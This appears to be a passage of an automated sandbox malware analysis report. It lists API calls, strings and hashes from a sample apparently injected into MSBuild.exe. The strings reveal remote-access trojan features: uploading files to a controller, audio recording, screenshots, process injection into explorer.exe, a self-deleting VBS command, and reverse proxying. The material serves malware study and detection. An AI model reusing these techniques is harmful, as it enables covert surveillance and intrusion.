                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                • API String ID: 1884690901-3066803209
                                                                                                • Opcode ID: c80ebbadcd18372f13a2498dc9f3057d2416bdf8da610c359471f90a3c4fc21e
                                                                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                • Opcode Fuzzy Hash: c80ebbadcd18372f13a2498dc9f3057d2416bdf8da610c359471f90a3c4fc21e
                                                                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                • _free.LIBCMT ref: 004500A6
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 004500C8
                                                                                                • _free.LIBCMT ref: 004500DD
                                                                                                • _free.LIBCMT ref: 004500E8
                                                                                                • _free.LIBCMT ref: 0045010A
                                                                                                • _free.LIBCMT ref: 0045011D
                                                                                                • _free.LIBCMT ref: 0045012B
                                                                                                • _free.LIBCMT ref: 00450136
                                                                                                • _free.LIBCMT ref: 0045016E
                                                                                                • _free.LIBCMT ref: 00450175
                                                                                                • _free.LIBCMT ref: 00450192
                                                                                                • _free.LIBCMT ref: 004501AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                • API String ID: 489098229-65789007
                                                                                                • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                APIs
                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-390638927
                                                                                                • Opcode ID: b9c1b49b829df1fe2864e03863090dc8d25ea8b56782256c0a9293e84f361e6f
                                                                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                • Opcode Fuzzy Hash: b9c1b49b829df1fe2864e03863090dc8d25ea8b56782256c0a9293e84f361e6f
                                                                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
                                                                                                • SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
                                                                                                • CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
                                                                                                • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,0040466D,00000000,?,?), ref: 00404856
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404867
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 0040486E
                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404880
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404885
                                                                                                • CloseHandle.KERNEL32(?,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 0040488A
                                                                                                • SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?), ref: 00404895
                                                                                                • CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?), ref: 0040489A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                APIs
                                                                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                • GetLastError.KERNEL32 ref: 00454A96
                                                                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                • GetLastError.KERNEL32 ref: 00454C58
                                                                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                • _free.LIBCMT ref: 0043946A
                                                                                                • _free.LIBCMT ref: 00439471
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                • Opcode Fuzzy Hash: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
APIs
• SetEvent.KERNEL32(?,?), ref: 00404E71
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
• TranslateMessage.USER32(?), ref: 00404F30
• DispatchMessageA.USER32(?), ref: 00404F3B
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: 30cced4407c4bd56c9aac8636a9d351c9d9c58a4e78ece0395014a5f9f46315c
• Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
• Opcode Fuzzy Hash: 30cced4407c4bd56c9aac8636a9d351c9d9c58a4e78ece0395014a5f9f46315c
• Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$@FG$@FG$Temp
• API String ID: 1107811701-2245803885
• Opcode ID: 920de69f0373f8c5ebd9921b7c2462668ad398608147f3a655d2fcc6e1121eba
• Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
• Opcode Fuzzy Hash: 920de69f0373f8c5ebd9921b7c2462668ad398608147f3a655d2fcc6e1121eba
• Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
APIs
• GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
• GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
• API String ID: 2050909247-4145329354
• Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
• Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
• Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
• Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
• Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
• Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
• Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
APIs
• _free.LIBCMT ref: 00446DDF
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00446DEB
• _free.LIBCMT ref: 00446DF6
• _free.LIBCMT ref: 00446E01
• _free.LIBCMT ref: 00446E0C
• _free.LIBCMT ref: 00446E17
• _free.LIBCMT ref: 00446E22
• _free.LIBCMT ref: 00446E2D
• _free.LIBCMT ref: 00446E38
• _free.LIBCMT ref: 00446E46
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
• Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
• API String ID: 3578746661-4192532303
• Opcode ID: 3b2201075f1ab3fd5919af6f491002daf6d5b955dadc3a620faa2112df55390a
• Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
• Opcode Fuzzy Hash: 3b2201075f1ab3fd5919af6f491002daf6d5b955dadc3a620faa2112df55390a
• Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
• Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
• Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
• Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: f14a08f16dbd2095b7a78a82ca45ed65b45b65831e0b0300d2840b9fe3e549d7
• Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
• Opcode Fuzzy Hash: f14a08f16dbd2095b7a78a82ca45ed65b45b65831e0b0300d2840b9fe3e549d7
• Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
APIs
• _strftime.LIBCMT ref: 00401AD3
  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
• waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
• API String ID: 3809562944-3643129801
• Opcode ID: e2c4918e224522a1fe961a9da54c3e2121ad945b56a097ac34f834352e4a3164
• Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
• Opcode Fuzzy Hash: e2c4918e224522a1fe961a9da54c3e2121ad945b56a097ac34f834352e4a3164
